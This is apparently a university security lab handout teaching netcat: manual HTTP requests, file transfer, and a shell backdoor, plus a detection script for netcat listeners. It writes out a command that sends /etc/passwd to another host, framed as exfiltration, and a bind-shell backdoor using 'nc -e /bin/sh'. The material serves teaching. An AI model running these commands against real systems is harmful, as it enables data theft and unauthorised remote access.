Netcat

Introduction

Netcat is described as the Swiss army knife of TCP/IP. It does a lot, and knowing how to use it can be invaluable in security. It's not the optimal tool for many jobs, but it's a lot quicker to use than reinventing the wheel.

Setup

To start the lab clone the 354 repo (if you haven't) and run the script for the lab.

git clone https://github.com/cs354/CS-354.git
bash CS-354/labs/ncat.bash

Since ncat is a network tool we need a separate client to make connections to this server. Open up your student environment in a separate shell; this will be your client. Keep both open side by side.

bash CS-354/student_environment.bash

Basic usage

Netcat's simplest use is as a replacement for telnet. Try the following in the client:

$ nc www.google.com 80
GET / HTTP/1.1^M
Host: www.google.com^M
^M

Where it says ^M, you actually have to press control-v and then enter. This produces the carriage return that HTTP requires before each newline. Optionally, you can add more headers to your request:

$ nc www.google.com 80
GET / HTTP/1.1^M
Host: www.google.com^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M

Another way to do this (which allows you to avoid pressing control-v all the time) is to pipe the output of some command to netcat. Here's an example:

$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n"' | nc www.google.com 80

Common command line flags

Transferring files

One thing you might come across is a host you can access, but it's hard to get files onto their machine. Netcat can easily transfer files for you. On the machine that you want to receive the file (we'll use the student env container for this, as if we are exfiltrating data from a server):

$ nc -vv -l -p 3000 > file

And on the machine from which you want to send the file (the other shell):

$ nc -vv hostname 3000 < /etc/passwd

Replace hostname with cs354-local (or cs354-NETID on vicious).

These simple commands just shovel the contents of a file over a TCP/IP connection. If you try this, note that in many cases these transfers will be filtered by a firewall. Try transferring a file from a machine in the Wilkinson lab to hamsa.

Creating a simple backdoor

Netcat has the ability to execute programs when it receives a connection. This feature can be used to easily create a back door to a machine. (On the server):

$ nc -l -p 3000 -e /bin/sh

And now from your student environment (replace ncat-local with ncat-NETID if on vicious):

$ nc ncat-local 3000

Then try typing 'ls' or any other command.
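The listeners set up above (nc -l -p 3000 for the file transfer and for the backdoor) show up on the server as ordinary listening sockets owned by an nc process. As an added, defender-side example that is not part of the lab, the script below picks those out of ss -ltnp output; the ss lines it parses are constructed, and the function and variable names are our own.

```sh
#!/bin/sh
# Constructed sample of `ss -ltnp` output (not captured from the lab hosts).
# On a real host, run:  ss -ltnp | netcat_listeners   (root sees all owners)
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      1      0.0.0.0:3000       0.0.0.0:*         users:(("nc",pid=4242,fd=3))
LISTEN 0      128    127.0.0.1:5432     0.0.0.0:*         users:(("postgres",pid=900,fd=5))
LISTEN 0      10     [::]:4444          [::]:*            users:(("ncat",pid=4300,fd=4))'

# Read ss output on stdin; print "port pid name" for every LISTEN row whose
# owning process is nc, ncat or netcat. ss shows the process name but not
# its arguments, so check /proc/PID/cmdline afterwards for flags like -e.
netcat_listeners() {
    awk '
        $1 == "LISTEN" {
            # Process column looks like users:(("nc",pid=4242,fd=3))
            if (match($NF, /\("(nc|ncat|netcat)",pid=[0-9]+/)) {
                proc = substr($NF, RSTART + 2, RLENGTH - 2)   # nc",pid=4242
                split(proc, f, "\",pid=")                      # f[1]=nc f[2]=4242
                n = split($4, addr, ":")                       # port is the last piece
                print addr[n], f[2], f[1]
            }
        }'
}

# Exit 0 when at least one netcat listener is present (usable from cron or
# a monitoring check), non-zero otherwise. Reads ss output on stdin.
has_netcat_listener() {
    [ -n "$(netcat_listeners)" ]
}

printf '%s\n' "$SAMPLE_SS" | netcat_listeners
```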


Additional

There is a lot that you can do with netcat. A short tutorial doesn't quite do it justice. If you have time, it would be good to read through the man page (man netcat) or to search online for things to try with it.

Classwork

Upload a PDF file on canvas containing screenshots to show you've done the following work.

Show that you can successfully download the webpage www.google.com. We expect to see the HTTP response from google.com.

Transfer an arbitrary file using netcat. We expect to see screenshots of two terminals sending and receiving the file.

Show that you can create a netcat backdoor and demonstrate an understanding of netcat's usefulness as a TCP client and server. We expect to see screenshots of the client connecting to the server and doing some command line operations.